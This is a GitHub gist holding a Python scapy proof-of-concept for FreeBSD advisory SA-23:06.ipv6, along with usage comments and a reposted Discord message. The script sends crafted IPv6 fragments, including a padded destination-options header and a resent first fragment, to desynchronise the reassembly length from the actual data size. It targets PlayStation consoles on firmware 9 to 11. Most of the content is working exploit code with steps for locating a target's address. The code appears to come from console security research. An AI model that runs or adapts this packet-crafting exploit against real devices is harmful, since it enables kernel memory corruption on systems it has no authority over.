Last active
April 10, 2024 10:41
-
-
Save lewiwiii/523926207a205f0d41ccca588f0682d3 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # This software is licensed under the GNU Affero General Public License (AGPL) version 3.0 or later. | |
| # For more details, see <https://www.gnu.org/licenses/agpl-3.0.html>. | |
| from scapy import all as sp | |
| import sys | |
| import random as rn | |
| iface = sys.argv[1] | |
| src_mac = sp.get_if_hwaddr(iface) | |
| dst_mac = "XXX" | |
| src_ip = "XXX" | |
| dst_ip = "XXX" | |
| eth = sp.Ether(src=src_mac, dst=dst_mac) | |
| p6 = sp.IPv6(src=src_ip, dst=dst_ip) | |
| frag_size = 0x500 | |
| ident = rn.randint(0, 0x1_0000) | |
| data = 'a' * (0xffff - 8) | |
| orig_p6 = (p6 / sp.ICMPv6EchoRequest(id=ident, data=data)).build() | |
| orig_p6 = sp.IPv6(orig_p6) | |
| # payload | |
| pl = orig_p6[1] | |
| pl_size = len(pl) | |
| pl_buf = pl.build() | |
| num_frag = pl_size // frag_size | |
| # last fragment | |
| lfrag_size = pl_size % frag_size | |
| print(pl, pl_size, num_frag, lfrag_size) | |
| fragh = sp.IPv6ExtHdrFragment(m=1, id=ident, nh=orig_p6.nh) | |
| def frag(to_frag, offset, size): | |
| return to_frag[offset : offset + size] | |
| def send_frag(payload, offset, m, mid=None): | |
| fragh.m = m | |
| fragh.offset = offset | |
| pkt = eth / p6 | |
| if mid is not None: | |
| pkt /= mid | |
| pkt /= fragh / payload | |
| sp.sendp(pkt, iface=iface, count=1, verbose=0) | |
| fm = 1 | |
| for i in range(num_frag): | |
| if not lfrag_size and i == num_frag - 1: | |
| # last index | |
| li = i | |
| continue | |
| foff = i * frag_size // 8 | |
| frag_pl = frag(pl_buf, i*frag_size, frag_size) | |
| if i == 0: | |
| # q6->ip6q_unfrglen > 0 | |
| send_frag(frag_pl, foff, fm, sp.IPv6ExtHdrDestOpt(options=sp.PadN(optdata=b'\x00'*100))) | |
| continue | |
| send_frag(frag_pl, foff, fm) | |
| # update q6->ip6q_unfrglen while keeping ip6af_offset of the first fragment | |
| # unchanged | |
| frag_pl = frag(pl_buf, 0, frag_size) | |
| send_frag(frag_pl, 0, 1) | |
| if lfrag_size: | |
| li = num_frag | |
| fm = 0 | |
| foff = frag_size * li // 8 | |
| frag_pl = frag(pl_buf, li*frag_size, lfrag_size) | |
| send_frag(frag_pl, foff, fm) |
If your ISP provides IPv6 you can just scan your network to find the console's address.
On the other hand if your ISP doesn't provide it you'll have the connect the console to your computer with a LAN cable and set up a manual Ethernet connection using PPPoE. After this you can test your internet connection on the console and trace the console's address using WireShark on your PC.
Remember that you have to provide the interface name as the argument before running the script.
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
repost from deleted message by abc on the PlayStation Devwiki discord server:
PoC for FreeBSD SA-23:06.ipv6. This only works for 9 <= FreeBSD <= 11. The SA concerns 12 and 13 but don't know how to trigger the bug for those. No kernel panic. Posting this for the people that can do better. Latest firmware checked is 11.00. You can check frag6_input() on your own 11.00 kernel dump.
The bug lets you mismatch the length of the ipv6 payload and the actual data size in the mbuf. You can't do this normally since there are checks on those, either the packet is dropped/trimmed. Haven't found anything yet to escalate the bug into something useful.
Depending on your platform/settings, the python script may need root privileges to send the packets. You need to provide the interface name as the first argument.
You need to provide the IPv6 address of your machine and console and the MAC of the console. Edit src/dst_ip and dst_mac.